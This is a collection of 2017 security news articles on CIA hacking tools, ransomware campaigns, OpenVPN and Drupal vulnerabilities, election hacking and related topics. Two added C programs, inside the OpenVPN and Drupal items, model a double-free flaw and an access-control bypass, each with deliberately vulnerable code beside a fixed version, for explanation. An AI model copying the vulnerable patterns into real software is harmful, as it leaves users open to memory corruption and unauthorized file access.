Pandemic – a CIA project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
Athena – a spyware framework that has been designed to take full control over Windows PCs remotely, and works against every version of Microsoft's Windows operating systems, from Windows XP to Windows 10.
AfterMidnight and Assassin – Two apparent CIA malware frameworks for the Windows platform that have been designed to monitor and report back the activities of an infected remote host and execute malicious actions.
Archimedes – Man-in-the-Middle attack tool allegedly created by the CIA to target computers inside a Local Area Network (LAN).
Scribbles – Software reportedly designed to embed 'web beacons' into confidential files and documents, allowing the agency to track whistleblowers and insiders.
Grasshopper – A framework which allowed the agency to easily create custom malware for breaking into Windows operating system and bypassing antivirus protection.
Marble – The source code of a secret anti-forensic framework, basically an obfuscator or a packer used by the spying agency to hide the actual source of its malware.
Dark Matter – Revealed hacking exploits the CIA designed to target iPhones and Macs.
Weeping Angel – A spying tool used by the CIA to infiltrate smart TVs and turn them into covert microphones.
Year Zero – Disclosed several CIA hacking exploits for popular hardware and software.


Necurs Botnet Distributing Locky Ransomware via Fake Invoices

22.6.2017 securityweek  Ransomware
The Necurs spam botnet has switched back to distributing the Locky ransomware in a campaign featuring messages disguised as fake invoices, Cisco Talos security researchers reveal.

Last year, Necurs was the main driver behind Locky's rise to the top of the ransomware charts, and the two were tightly connected. After going quiet for several months in early 2017, Necurs resumed activity in April, but distributed Locky for only a few weeks.

Starting around May 12, the same day WannaCry made its first appearance, Necurs switched to distributing a new ransomware family called Jaff. The malware was found to be tightly connected to Locky, as the same actor operated both ransomware families.

Earlier this month, however, Kaspersky Lab security researchers discovered vulnerabilities in Jaff and managed to create a decryptor for it, allowing victims to recover their data for free. Although three Jaff variants were observed to date, the decryption tool would work for all three of them.

The decryptor’s release apparently took Jaff out of the race, and Necurs returned to pushing Locky once again. The spam emails pushing the ransomware feature a double-zipped archive with an .exe file inside. Unlike previous Necurs-driven campaigns, which used themes such as order confirmations, payment receipts, and business documents, the new messages are fake invoices.

The newly observed campaign, Talos reports, features a notable volume of spam: during the first hour, it accounted for around 7% of the email volume registered by one of the company’s systems. The volume has decreased, but the campaign continues to be active, the security researchers say.

The campaign uses the same affiliate ID as before, but the ransomware itself appears to have suffered a series of changes, one of which prevents it from encrypting data on systems running under operating systems more recent than Windows XP.

The command and control (C&C) URL structure is another notable aspect of this campaign, the security researchers say: “Adversaries behind this latest Locky campaign have reused the /checkupdate path as part of the URL structure -- the same URL structure found in previous Locky campaigns. This is perhaps another indication that adversaries were hasty in their developing and distributing this campaign.”

Talos suggests that Locky’s operators are likely aware of the existing issues with the ransomware, and that an updated variant of the malware is likely to emerge soon, addressing the bug. At the moment, however, the Locky sample distributed via Necurs can encrypt only Windows XP systems.

“It's always risky clicking on links or opening attachments in strange email messages. Users that fail to heed this advice can easily become ransomware victims, and if the subsequent ransom is paid, the monies will no doubt fund another round of attacks. As always, organizations are encouraged to make regular backups of their data, practice restoring said data, and store backups offline far out of the reach of potential criminals,” Talos said.


Consortium Promotes Principles for Fair and Accurate Security Ratings

22.6.2017 securityweek IT
Under the aegis of the U.S. Chamber of Commerce, more than 40 companies -- including some of America's largest banks and tech companies -- have signed up to a set of new guiding principles for fair and accurate security ratings.

Security rating has become an emerging technology over the last few years, with companies such as BitSight (which raised $40 million in Series C financing, September 2016), RiskRecon, and SecurityScorecard all offering to rate the security of companies and products. It's a valuable service, helping organizations better understand the security of their supply chain, and helping cybersecurity insurance companies understand the risk inherent in potential customers.

But there are difficulties. In a statement Tuesday, Ann Beauchesne, an SVP at the Chamber of Commerce, explained, "There is, of course, the potential for the rating to be inaccurate, irrelevant, incomplete, or unverifiable. Problematic source data can create unfair and unreliable ratings, which serves neither the consumers of security ratings nor the organizations whose programs are rated."

One of the problems is the 'black box' nature of the scores. The rating companies collect data -- sometimes with and sometimes without the knowledge of the target company -- from a wide range of sources. This data is fed into a proprietary algorithm and, simplistically, out pops a score. The value of a complex security program reduced to a single score is not always apparent or verifiable.

To solve this problem she continued, "a group of U.S. Chamber member companies have worked closely with security rating companies to develop a concrete set of principles (PDF) to increase confidence in, and usability of, fair and accurate security ratings."

The principles comprise transparency; dispute resolution; accuracy and validation; methodology model governance; independence; and confidentiality -- and the attempt is to bring consistency and credibility to an emerging market.

"The fact that so many large organizations are coming together on this issue shows that the Security Rating Services market is here, real, important, and essential for the future of B2B risk management," BitSight's SVP Jake Olcott told SecurityWeek.

While insurance providers can use ratings in their premium calculations, by far the bigger market comes from general commerce. Most large companies now have thousands of new cloud services as part of their supply chain, and CISOs struggle to get an accurate view of the risk they bring. This unquantifiable risk will only grow.

By 2020, claims Olcott, security ratings will be as important as credit ratings. "Just as credit ratings are part of every B2B transaction," he said, "so too will security ratings become a critical element. [There are] many reasons for this, including the ever-expanding business ecosystem, the explosion of third party breaches, the challenge of finding cyber security and risk talent, and the difficulty in assessing cyber risk of the ecosystem at scale (quickly and cost-effectively)."

For that to happen, there must be trust in the accuracy and consistency of the rating process and the rating scores -- both between scores from the same rating company, and between scores generated by different companies. Backed by major cross-sector companies such as Goldman Sachs and JPMorgan, Microsoft and Verizon, and Starbucks and Eli Lilly, the Chamber of Commerce principles will go a long way towards providing that trust.


Honda Halts Production at Japan Plant After Cyber Attacks

22.6.2017 securityweek Cyber
Honda said Wednesday it had temporarily halted production at a plant in Japan after it suffered a cyberattack from the same ransomware that struck hundreds of thousands of computers worldwide last month.

The Japanese automaker said it had shut its plant in Sayama, near Tokyo, on Monday after discovering its computer system was infected with the so-called WannaCry virus.

The virus encrypts computer files, making them inaccessible until users pay a ransom.

"The malware affected the production of about 1,000 cars," a Honda spokeswoman told AFP, adding that production restarted on Tuesday.

"There is a possibility that our overseas facilities were also infected... We're now investigating that," she added.

Honda's plant produces a number of models including the Accord sedan and Odyssey Minivan.

The unprecedented global cyberattacks, which started in mid May, struck banks, hospitals and government agencies in more than 150 countries, exploiting known vulnerabilities in old Microsoft computer operating systems.

In May, French auto giant Renault was hit, forcing it to halt production at sites in France, Slovenia and Romania as part of measures to stop the spread of the virus.

Nissan's British unit in Sunderland was also hit in the attack.

In Japan, 2,000 computers at 600 companies and organisations had been affected by the May virus, according to media reports.

Japanese conglomerate Hitachi was also affected, saying its computer networks were "unstable", crippling its email systems.

Authorities across the world have issued public alerts warning computer users to beware of suspicious emails and beef up their computer security measures.


Social Media 'Bots' From Russia Distorting Global Politics: Study

22.6.2017 securityweek Social
A wave of "computational propaganda," largely driven by Russia, is impacting politics around the world by spreading misinformation designed to manipulate public opinion, researchers said Tuesday.

The Oxford University team presented research in Washington on the use of automated programs or "bots" on social media aimed at influencing politics in nine countries, including the United States.

"Computational propaganda is one of the most powerful new tools against democracy," said the research paper directed by Oxford's Philip Howard and Samuel Woolley.

The research is not the first to note the existence of Twitter bots and other automated tools aimed at disrupting politics but offers insight into the global scale of efforts, which are traced mainly to Russia but also operate in China and in the target countries themselves.

"We know that there is a building with hundreds of employees in St. Petersburg with a budget of millions of dollars dedicated to manipulating public opinion" in a number of countries, Howard said at a media presentation.

Howard said the Russian style of propaganda involves "seeding multiple, conflicting and contradictory stories."

Woolley said the goal of this effort "is to confuse, it's not necessarily to sell a fake story. It's to make people so apathetic about politics and policy in general that they don't really want to engage anymore."

The research team analyzed tens of millions of posts on seven different social media platforms during elections, political crises, and national security incidents between 2015 and 2017 in Brazil, Canada, China, Germany, Poland, Taiwan, Russia, Ukraine, and the United States.

- Social media battles -

While propaganda and fake news are longstanding tools in politics, the use of automation and algorithms to create bots on social media appears to have accelerated the spread of misinformation.

Platforms like Facebook and Twitter have taken steps to curb the spread of fake news stories while also arguing it is not their role to edit or control content.

The researchers said Twitter is more vulnerable to bots because it allows users to set up anonymous accounts and its programming platform is open.

In the United States, the researchers said they concluded that bots had "measurable influence" during the 2016 election by affecting the flow of information.

"Social media bots manufacture consensus by artificially amplifying traffic around a political candidate or issue," the researchers wrote.

"Armies of bots built to follow, retweet, or like a candidate's content make that candidate seem more legitimate, more widely supported, than they actually are... the illusion of online support for a candidate can spur actual support through a bandwagon effect."

In Russia, the researchers said they found 45 percent of the political conversation is dominated by "highly automated accounts."

While Twitter was an effective tool for pro-democracy activists during the Arab Spring movements starting in 2010, the researchers say authoritarian governments now use these platforms to suppress social activism.

Perhaps the most flagrant examples of computational propaganda are in Ukraine, they said, describing it as "the frontline of numerous disinformation campaigns in Europe."

They said fake stories such as one about "a crucified boy" or another about Ukrainian soldiers being paid with "two slaves and a piece of land" have turned into "textbook examples of how propaganda works."


Critical RCE Flaw Found in OpenVPN that Escaped Two Recent Security Audits
22.6.2017 thehackernews
Vulnerability
A security researcher has found four vulnerabilities in OpenVPN, including a critical remote code execution bug, that were not caught by either of the two major security audits of the open source VPN software conducted this year.
OpenVPN is one of the most popular and widely used open source VPN solutions; it serves a range of connectivity needs but is especially popular for anonymous and private access to the Internet.
This year, two independent security audits of OpenVPN were carried out to look for flaws, backdoors, and other defects in the open source software, one of them conducted by a team led by Johns Hopkins University cryptographer Dr. Matthew D. Green.
The audits led to patches for a handful of vulnerabilities and otherwise gave OpenVPN a clean bill of health.
Researcher Used Fuzzer to find Bugs in OpenVPN
Dutch researcher Guido Vranken, relying solely on a fuzzer, recently discovered four security holes in OpenVPN that escaped both audits.
Three of the four flaws are server-side, two of them causing the server to crash; the fourth is a client-side bug that could allow an attacker to steal the password a client uses to authenticate to an HTTP proxy.
The most critical vulnerability is CVE-2017-7521, which affects the OpenVPN server and resides in the extract_x509_extension() function, which parses fields of client SSL certificates.
A remote, authenticated attacker could send a crafted certificate that either crashes the OpenVPN service or triggers a double free that could potentially lead to remote code execution on the server.
Vranken was not able to demonstrate the RCE bug but argued that remote code execution could be achieved in theory. In a report published Wednesday, he explained how the service's failure to check a particular return value, combined with an attacker's ability to remotely drain the server's memory, could turn the bug into a remote double free.
"If you look in the OpenSSL source code, one way through which ASN1_STRING_to_UTF8 can fail is if it cannot allocate sufficient memory," Vranken said in his report. "So the fact that an attacker can trigger a double-free IF the server has insufficient memory, combined with the fact that the attacker can arbitrarily drain the server of memory, makes it plausible that a remote double-free can be achieved."
"But if a double-free is inadequate to achieve remote code execution, there are probably other functions, whose behavior is wildly different under memory duress, that you can exploit."
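To make the mechanism Vranken describes concrete, the following is an added model in C; it is not OpenVPN's or OpenSSL's code. It assumes, following the report's description, that on failure the conversion routine leaves its output pointer untouched, so a caller that ignores the return value ends up freeing the buffer from the previous certificate entry a second time. The names `to_utf8`, `vulnerable_extract` and `fixed_extract` are illustrative, the two subjectAltName entries are constructed input, and the pointer-tracking shim exists only so the double free is counted rather than handed to the real allocator.

```c
/* Model of the CVE-2017-7521 pattern: a caller ignores the return value of a
 * string-conversion routine and frees whatever its output pointer still holds.
 * Illustrative code, not OpenVPN's or OpenSSL's. The tracking shim only makes
 * the double free countable instead of corrupting the real heap. */
#include <stdlib.h>
#include <string.h>

#define TRACK 64
static void *freed[TRACK];
static int nfreed, double_frees;

static void reset_tracker(void) { nfreed = 0; double_frees = 0; }

/* An address malloc() hands out again is live again: forget it. */
static void *tracked_malloc(size_t n)
{
    void *p = malloc(n);
    for (int i = 0; i < nfreed; i++)
        if (freed[i] == p) { freed[i] = freed[--nfreed]; break; }
    return p;
}

/* Free once; a repeat is counted instead of being passed to free(). */
static void tracked_free(void *p)
{
    if (p == NULL) return;
    for (int i = 0; i < nfreed; i++)
        if (freed[i] == p) { double_frees++; return; }
    if (nfreed < TRACK) freed[nfreed++] = p;
    free(p);
}

/* Stand-in for ASN1_STRING_to_UTF8(): length on success, -1 on failure.
 * As in OpenSSL, failure ('fail' stands for the allocation failure the
 * report describes) leaves *out untouched. */
static int to_utf8(unsigned char **out, const char *in, int fail)
{
    size_t len = strlen(in);
    unsigned char *buf;
    if (fail) return -1;
    buf = tracked_malloc(len + 1);
    if (buf == NULL) return -1;
    memcpy(buf, in, len + 1);
    *out = buf;
    return (int)len;
}

/* Vulnerable shape: return value ignored. 'buf' is declared once here for
 * determinism; in the original it was a per-iteration local whose reused
 * stack slot still held the previous, already freed pointer (an assumption
 * drawn from the report). Returns how many double frees occurred. */
static int vulnerable_extract(const char *const *names, const int *fail, int n)
{
    unsigned char *buf = NULL;
    reset_tracker();
    for (int j = 0; j < n; j++) {
        to_utf8(&buf, names[j], fail[j]);  /* result not checked */
        tracked_free(buf);                 /* stale pointer when it failed */
    }
    return double_frees;
}

/* Fixed shape: fresh pointer per entry and the return value is checked. */
static int fixed_extract(const char *const *names, const int *fail, int n)
{
    reset_tracker();
    for (int j = 0; j < n; j++) {
        unsigned char *buf = NULL;
        if (to_utf8(&buf, names[j], fail[j]) < 0) continue;
        tracked_free(buf);
    }
    return double_frees;
}

/* Constructed input: two subjectAltName entries, the second failing to convert. */
static const char *const sample_names[] = { "alice@example.org", "bob@example.org" };
static const int sample_fail[] = { 0, 1 };

int main(void)
{
    int v = vulnerable_extract(sample_names, sample_fail, 2);
    int f = fixed_extract(sample_names, sample_fail, 2);
    return (v == 1 && f == 0) ? 0 : 1;
}
```

The point the model makes is that the attacker does not need to control the pointer: making the conversion fail on the second entry (which the report ties to memory exhaustion) is enough to have the first entry's buffer released twice, and checking the return value before the free is the whole fix.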
The second vulnerability, CVE-2017-7520, resides in the way OpenVPN connects to a Windows NTLM version 2 proxy.
A man-in-the-middle attacker between the OpenVPN client and the proxy server can either remotely crash the client or steal the user's password to the proxy from a memory leak.
The vulnerability can be triggered only under certain circumstances, such as when the client connects to a proxy using NTLM version 2 authentication, or when the client specifies a username ending with a backslash.
"If clients use a HTTP proxy with NTLM authentication (--http-proxy <server> <port> [<authfile>|'auto'|'auto-nct'] ntlm2), a man-in-the-middle [MITM] attacker between the client and the proxy can cause the client to crash or disclose at most 96 bytes of stack memory," the OpenVPN team explains.
"The disclosed stack memory is likely to contain the proxy password. If the proxy password is not reused, this is unlikely to compromise the security of the OpenVPN tunnel itself. Clients who do not use the --http-proxy option with ntlm2 authentication are not affected."
The other two vulnerabilities (CVE-2017-7508 and CVE-2017-7522) are remote server crashes that can be triggered by sending maliciously crafted IPv6 packets or malicious data after authentication.
Patches for Servers and Clients Already Available
Vranken responsibly disclosed all the vulnerabilities he discovered to the OpenVPN team in May and June and the team has already patched the issues in its latest version of the VPN software.
While there is no evidence that any of these vulnerabilities has been exploited in the wild, users are strongly advised to update their installations to OpenVPN 2.4.3 or 2.3.17 as soon as possible.
For more in-depth technical details of all the vulnerabilities, you can head on to the report titled, "The OpenVPN Post-Audit Bug Bonanza," published by Vranken on Wednesday.


Drupal Patches Flaw Exploited in Spam Campaigns

22.6.2017 securityweek  Exploit  Spam
Drupal security updates released on Wednesday address several vulnerabilities, including one that has been exploited in spam campaigns.

The flaw exploited in the wild, patched with the release of Drupal versions 7.56 and 8.3.4, is a moderately critical access bypass vulnerability tracked as CVE-2017-6922.

The problem is that files uploaded by anonymous users to a private file system can be accessed by all anonymous users, not just the user who uploaded them, as it should be. The security hole only affects websites that allow anonymous users to upload files to a private file system.

Drupal has known about attacks exploiting this flaw since October 2016. At the time, it warned that misconfigured websites had been abused by malicious actors to host files and point users and search engines to them. The latest updates for Drupal 7 and 8 introduce a protection that should prevent exploitation.

“For example, if a webform configured to allow anonymous visitors to upload an image into the public file system, that image would then be accessible by anyone on the internet. The site could be used by an attacker to host images and other files that the legitimate site maintainers would not want made publicly available through their site,” the Drupal Security Team said in its October 2016 advisory.
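The following is an added illustration of the access-check shape behind this bypass, written in C; it is not Drupal's code. It assumes, as in Drupal's user model, that every anonymous visitor carries the same account id (0), so a private-file check that compares only the owner id treats all anonymous visitors as the uploader. The session-binding check shown as the fix is an assumed remedy for illustration, not necessarily the protection shipped in 7.56 and 8.3.4; the three visitors are constructed input.

```c
/* Model of the access-bypass shape behind CVE-2017-6922 (added illustration,
 * not Drupal's code). Private files are served only to their owner, but all
 * anonymous visitors share one account id (0 here, as in Drupal), so a check
 * on the owner id alone serves any anonymous upload to every anonymous
 * visitor. The fixed check is an assumed remedy: it also binds an anonymous
 * upload to the session that created it. */
#include <string.h>

#define ANONYMOUS_UID 0

struct private_file {
    int fid;
    int owner_uid;
    const char *owner_session;  /* recorded only for anonymous uploads */
};

struct visitor {
    int uid;
    const char *session;
};

typedef int (*access_check)(const struct private_file *, const struct visitor *);

/* Vulnerable shape: ownership decided by account id only. */
static int vulnerable_can_download(const struct private_file *f, const struct visitor *v)
{
    return f->owner_uid == v->uid;
}

/* Fixed shape: an anonymous owner must also present the uploading session. */
static int fixed_can_download(const struct private_file *f, const struct visitor *v)
{
    if (f->owner_uid != v->uid)
        return 0;
    if (f->owner_uid == ANONYMOUS_UID)
        return f->owner_session != NULL && v->session != NULL &&
               strcmp(f->owner_session, v->session) == 0;
    return 1;
}

/* Register an upload, keeping the session only when the uploader is anonymous. */
static struct private_file record_upload(int fid, const struct visitor *who)
{
    struct private_file f = { fid, who->uid, NULL };
    if (who->uid == ANONYMOUS_UID)
        f.owner_session = who->session;
    return f;
}

/* Constructed scenario: an anonymous uploader, an unrelated anonymous visitor
 * and a logged-in member all request the anonymous upload. */
static const struct visitor uploader = { ANONYMOUS_UID, "sess-a1" };
static const struct visitor stranger = { ANONYMOUS_UID, "sess-b2" };
static const struct visitor member   = { 42, "sess-c3" };

/* Whether 'who' may fetch the uploader's private file under a given check. */
static int allows(access_check check, const struct visitor *who)
{
    struct private_file f = record_upload(7, &uploader);
    return check(&f, who);
}

int main(void)
{
    int leak = allows(vulnerable_can_download, &stranger);  /* 1: bypass */
    int ok = !allows(fixed_can_download, &stranger) &&
             allows(fixed_can_download, &uploader) &&
             !allows(fixed_can_download, &member);
    return (leak && ok) ? 0 : 1;
}
```

The design point is that "owner" is not a usable identity for anonymous principals: any check that must distinguish one anonymous visitor from another has to key on something per-visitor (here the session), and the same reasoning applies to any framework that maps all guests onto a single account record.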

Drupal 8.3.4 also patches a critical issue related to how the PECL YAML parser handles unsafe objects. An attacker can exploit the flaw, tracked as CVE-2017-6920, for remote code execution.

Another vulnerability fixed in Drupal 8 is a less critical improper field validation bug (CVE-2017-6921).

“A site is only affected by this if the site has the RESTful Web Services (rest) module enabled, the file REST resource is enabled and allows PATCH requests, and an attacker can get or register a user account on the site with permissions to upload files and to modify the file resource,” Drupal said in its advisory.

The Drupal Security Team warned users in mid-April that a serious vulnerability affected a third-party module named References, which had been used by more than 121,000 websites. The module had no longer been supported and Drupal initially advised users to migrate to a different product. However, a new maintainer took over the project shortly after and the flaw was addressed.


Russia Targeted Election-Related Networks in 21 States: DHS

22.6.2017 securityweek BigBrothers
Hackers believed to be working for the Russian government targeted election-related networks in 21 U.S. states, representatives of the Department of Homeland Security (DHS) told the Senate Intelligence Committee on Wednesday in a hearing on threats to election infrastructure.

DHS officials revealed that the agency’s Office of Intelligence and Analysis (I&A) published a report in October claiming that cyber actors possibly connected to the Russian government had targeted websites and other election-related systems in 21 states. The states have not been named, but some news organizations previously reported that the list includes Arizona and Illinois.

The DHS said only a “small number” of networks were compromised, but it did not find any evidence that vote tallies had been altered. In many cases, only attempts to scan election infrastructure were detected.

The DHS has admitted that cyberattack attribution is difficult, but the agency appears confident that the Russian government was involved in these operations.

A few months before last year’s presidential election, the DHS said there was no indication that cyber threat actors had been planning to attack election infrastructure in a way that would change the outcome of the vote, and noted that the checks and redundancies in the system made the task difficult. However, the agency warned at the time that “cyber operations targeting election infrastructure could be intended or used to undermine public confidence in electoral processes and potentially the outcome.”

In his statement before the Senate Intelligence Committee, Bill Priestap, Assistant Director of the FBI’s Counterintelligence Division, said “Russia’s 2016 presidential election influence effort was its boldest to date in the United States.”

“Moscow employed a multi-faceted approach intended to undermine confidence in our democratic process. Russia’s activities included efforts to discredit Secretary Clinton and to publicly contrast her unfavorably with President Trump,” Priestap stated. “This Russian effort included the weaponization of stolen cyber information, the use of Russia’s English-language state media as a strategic messaging platform, and the mobilization of social media bots and trolls to spread disinformation and amplify Russian messaging.”

The FBI is still investigating the extent of Russia’s interference, including whether or not any of President Donald Trump’s current or former associates aided Moscow’s efforts.

The United States has officially accused Russia of attempting to interfere with the November election, but the Kremlin has denied the allegations. Russian President Vladimir Putin recently admitted that patriotic hackers may have launched attacks, but denied government involvement and said hacking is unlikely to have a real impact on elections in a country.

Top secret documents leaked recently from the National Security Agency (NSA) also show that hackers affiliated with the Russian military had repeatedly attempted to break into U.S. voting systems before the election.


Honda halted production in a factory after finding WannaCry traces in its networks
22.6.2017 securityaffairs
Ransomware

Honda shut down a factory in Japan after finding the WannaCry ransomware in its networks, five weeks after the malware's massive outbreak.
The WannaCry ransomware makes the headlines once again: Honda stopped production at one of its plants in Japan after discovering the malware in its computer networks.

Honda halted activities at the Sayama plant, northwest of Tokyo, on Monday after finding that the WannaCry ransomware had infected systems in its networks across Japan, North America, Europe, China, and other regions.

According to the Reuters agency, the experts discovered the infection on Sunday.

“The automaker shut production on Monday at its Sayama plant, northwest of Tokyo, which produces models including the Accord sedan, Odyssey Minivan and Step Wagon compact multipurpose vehicle and has a daily output of around 1,000 vehicles.” states the article.

“Honda discovered on Sunday that the virus had affected networks across Japan, North America, Europe, China and other regions, a spokeswoman said, despite efforts to secure its systems in mid-May when the virus caused widespread disruption at plants, hospitals and shops worldwide.”

According to a Honda spokesman, production at other plants was not affected, and regular operations at the Sayama plant resumed on Tuesday.

It is still unclear why WannaCry was present in Honda's networks five weeks after its discovery; the only certainty is that the company had yet to apply the critical patch Microsoft released in March.

One possibility is that the company's IT staff had inadvertently blocked access to the kill-switch domain: WannaCry only proceeds with infection when that domain cannot be reached, so blocking it inside the corporate network would have let the worm keep propagating.

We cannot exclude that the shutdown of the Sayama plant was a precautionary measure to eradicate dormant instances of the ransomware.

Honda wasn’t the only company forced to shut down its networks due to WannaCry, other automakers like Renault and Nissan Motor were affected and were forced to halt productions in plants in Japan, Britain, France, Romania, and India.

It’s my opinion that the failure in responding to the WannaCry attack was primarily caused by the failure of patch management processes. Don’t forget that systems across the world were infected by ransomware that was exploiting a flaw that had already been fixed by a two-month-old patch.


Attackers can exploit electronic cigarettes to hack computers
22.6.2017 securityaffairs
Exploit

Hackers can exploit electronic cigarettes, like any other USB-powered device, to deliver malware into a poorly protected network.
In November 2014, a discussion on Reddit described a case of malware implanted by means of an electronic cigarette charged over USB.

Attackers can abuse almost any electronic device to deliver malware into a poorly protected network. The idea of electronic cigarettes as an attack vector may sound amusing, but many of them charge over USB, either through a special cable or by plugging one end of the cigarette directly into a USB port.

The Reddit post described a strange case: an executive found malware on his system without being able to identify its source immediately.

“One particular executive had a malware infection on his computer from which the source could not be determined,” reported a Reddit user. “After all traditional means of infection were covered, IT started looking into other possibilities.”

The investigation eventually traced the infection to the executive's electronic cigarette: the malware was hardcoded into its charger, and once the charger was connected to the computer, the malicious code contacted its C&C server to drop further payloads and infect the system.

Electronic cigarettes or vape pens properly modified could be an effective hacking tool to infect a targeted computer.

Security researcher Ross Bevington presented at BSides London how an electronic cigarette can be used to compromise a computer by tricking it into believing that the device is a keyboard.

It is important to note that Bevington’s attack required the victim’s machine to be unlocked.

“PoisonTap is a very similar style of attack that will even work on locked machines,” Mr Bevington told Sky News.

Bevington also explained that a modified electronic cigarette could be used to interfere with the host's network traffic.

E-cigarettes are powered by a rechargeable lithium-ion battery that is charged either through a cable or by connecting the device directly to a computer's USB port.

“Security researchers have demonstrated how e-cigarettes can easily be modified into tools to hack computers.” reported SkyNews.

“With only minor modifications, the vape pen can be used by attackers to compromise the computers they are connected to – even if it seems just like they are charging.”
The researcher @FourOctets published a proof-of-concept video which showed arbitrary commands being sent to an unlocked laptop just by charging a vape pen.

Wll buy derby ticket (@FourOctets): "Sorry if I get vape pens banned at your work place......" (5:29 PM - 25 May 2017)
@FourOctets modified the vape pen simply by adding a hardware chip that let the device present itself to the laptop as a keyboard or mouse.

“A pre-written script that was saved on the vape made Windows open up the Notepad application and typed “Do you even vape bro!!!!“” reported SkyNews.


Mozilla Brings Privacy-Focused Browser to Android

21.6.2017 securityweek Android
After making it available for iOS devices in November 2016, Mozilla this week brought its privacy-focused mobile browser to Android.

Called Firefox Focus, the application is designed to address the various threats to user privacy that loom on the web, while also providing users with a fast, free, and easy-to-use browsing experience.

On iOS, the browser currently enjoys a 4.6 average rating on the App Store, making it “the highest rated browser from a trusted brand for the iPhone and iPad,” Mozilla says.

The main feature of the browser is to block ad, analytics, social, and various other trackers, without requiring users to change their settings. Because of that, it can provide users with increased control on how their online activities are tracked on their devices, regardless of whether they surf the Internet from a smartphone or tablet.

The Android version packs the very same features, and is “free of tabs and other visual clutter,” Mozilla’s Barbara Bermes reveals. The same as the iOS counterpart, the application allows users to browse the web without being followed by tracking ads, thus also offering a faster experience.

Additionally, the browser features an easily accessible “Erase” button that allows users to clear the browsing session data with a single tap. All of the privacy enhancements in Firefox Focus, Mozilla says, are available without requiring users to modify their settings.

“Browse like no one’s watching. The new Firefox Focus automatically blocks a wide range of online trackers — from the moment you launch it to the second you leave it. Easily erase your history, passwords and cookies, so you won’t get followed by things like unwanted ads,” Mozilla notes in the browser’s description in Google Play.

According to Bermes, Firefox Focus for Android comes with some additional features, such as an ad tracker counter (to see how many ads are blocked per site), the option to disable tracker blocker (for sites that are not loading correctly), and a notification reminder (it reminds users they can easily tap to erase the browsing history while the browser runs in the background).

“For Android users we also made Focus a great default browser experience. Since we support both custom tabs and the ability to disable the ad blocking as needed, it works great with apps like Facebook when you just want to read an article without being tracked,” Bermes continues.

The browser, she notes, was meant to empower users on the mobile web, and is expected to receive new features that will improve the experience it provides.

Chrome is currently the uncontested leader in the browser market, but Mozilla’s privacy-focused application could impact its dominance, Chris Olson, CEO of The Media Trust, told SecurityWeek in an emailed statement.

“It will be interesting to see how this latest Firefox browser will impact Chrome's dominance of the browser market. In attempts to differentiate itself with default ad blocking, Firefox is potentially alienating partners in the hopes of driving user adoption. It remains to be seen how many users disable the ad block feature as many of the world's most heavily-trafficked websites won't load properly on mobile devices when an ad blocker is active,” Olson said.

Firefox Focus for Android is available via Google Play, while the iOS version can be downloaded through the App Store.


Average Cost of Data Breach Drops Globally, Rises to $7.35 Million in U.S.

21.6.2017 securityweek Incident
Cost of Data Breach Drops Globally, But Rises 5% in U.S.

The 2017 IBM Security and Ponemon Institute annual report on the cost of a breach shows that the cost of stolen records and the total cost of a breach continues to rise -- at least in America. The lost- or stolen-record cost rose from $221 to $225 each, while the average total cost of a breach increased from $7.01 million to $7.35 million for organizations in the United States.

In the European countries included in the study -- France, Germany, Italy and the United Kingdom -- these costs actually fell. For example, in the UK, the average per capita cost of a data breach decreased from £102 to £98 and the average total organizational cost decreased from £2.53 million in 2016 to £2.48 million in 2017.

The annual Cost of Data Breach Study (PDF) is one of security's yearly benchmark reports. This year, Ponemon Institute, sponsored by IBM, analyzed the cost-effect of data breaches for more than 400 companies in 13 countries. However, it should be noted that not everyone believes it is possible to accurately define and compare different breaches in different companies over time. In recent years both Verizon and ENISA have said it is too difficult.

SecurityWeek asked Diana Kelley, global executive security advisor to IBM Security, whether such criticisms are fair. "It's hard to do these comparisons," she admitted, "but Ponemon goes to great pains over many months using a consistent methodology to ensure they are valid." While the breached companies change, the methodology for data gathering remains consistent, and the bottom line, she added, is that "IBM is confident in their validity, and we are seeing a picture of what can save us money when we have a breach; and also things that result in that cost being higher than perhaps it needs to be."

In America, the key factors in reducing the cost of a breach are incident response, encryption and education. Having an incident response team in place resulted in a $19 reduction in cost per lost or stolen record, followed by extensive use of encryption ($16 reduction per record) and employee training ($12.50 reduction per record). None of this is rocket science, suggested Kelley; "but sometimes it takes science-backed data figures to make us realize just how important they are."

Notable factors increasing the cost of a breach include the involvement of third parties in a data breach (increasing the cost by $17 per record), compliance failures and a 'rush to notify'. The first of these is a well-understood threat vector. "Organizations need to evaluate the security posture of their third-party providers – from payroll to cloud providers to CRM – to ensure the security of employee and customer data," says IBM.

The latter two, however, are worth considering in relation to the difference in breach costs between America and Europe, together with the different compliance regulations of the two areas. "In Europe," suggested Kelley, "we've had the EU Data Protection Directive for many years, and now we have the upcoming GDPR. This area has been dealing with very strict data privacy laws for a very long time. We suspect that this is the primary reason for the difference -- because of this ongoing need to be more mature with data protection, it has led to a more efficient and optimized series of response programs in Europe."

IBM does not claim that this is a proven conclusion, but just one worth considering. If it is true, however, it leads to further useful speculation. At one level, it supports the EU's insistence on strict and rigid rules. But it also confirms that security really can work -- breaches may not be preventable, but effective incident response will certainly make them less costly.

There could be other causes, of course. Do Europeans simply spend more on security than their American counterparts, or do they use it more efficiently? This is difficult to answer. The two regions are broadly similar, although the US is considered to be the richer (according to the Federalist Debate, GDP is around 40% higher in the US than in the EU).

Certainly, according to IDC's 2016 Worldwide Revenue for Security Technology Forecast, "the United States will be the largest market for security products throughout the forecast. In 2016, the U.S. is forecast to see $31.5 billion in security-related investments. Western Europe will be the second largest market with revenues of nearly $19.5 billion this year."

It would appear from this that European companies do not spend more on security than American companies -- which leads us back to the idea that strict data privacy laws can spur companies to more efficient data protection. The upcoming GDPR, of course, will affect US companies in ways they were not affected by the existing European laws.

If the hypothesis that conforming to strict compliance requirements can improve security and reduce breach costs holds, then over the next few years the cost of a breach in the US might start to decrease in line with Europe. "It's going to be interesting," Kelley told SecurityWeek. "Looking at the processes, procedures and technology within GDPR, there's a lot in there that can really help a company mature their overall data program. We can't predict the future -- but we shall see."

There is, of course, a huge amount of data within the Cost of Breach Study. Usually, it takes readers a considerable amount of time to isolate and analyze the particular information of interest. Here we have looked at just one area: the effect of compliance on the cost of a breach. This year, however, the study is accompanied by an online tool that will help companies delve deeper into different areas of the study: such as the effect of customer churn following a breach, the effect of employing a CISO on costs, and so on.

"This interactive tool," IBM told SecurityWeek, "allows you to explore the data from the report on your own, uncover trends and learn more about the cost of a data breach directly related to specific industries and/or security measures."


Three years ago ProtonMail was launched. Today, it is launching ProtonVPN
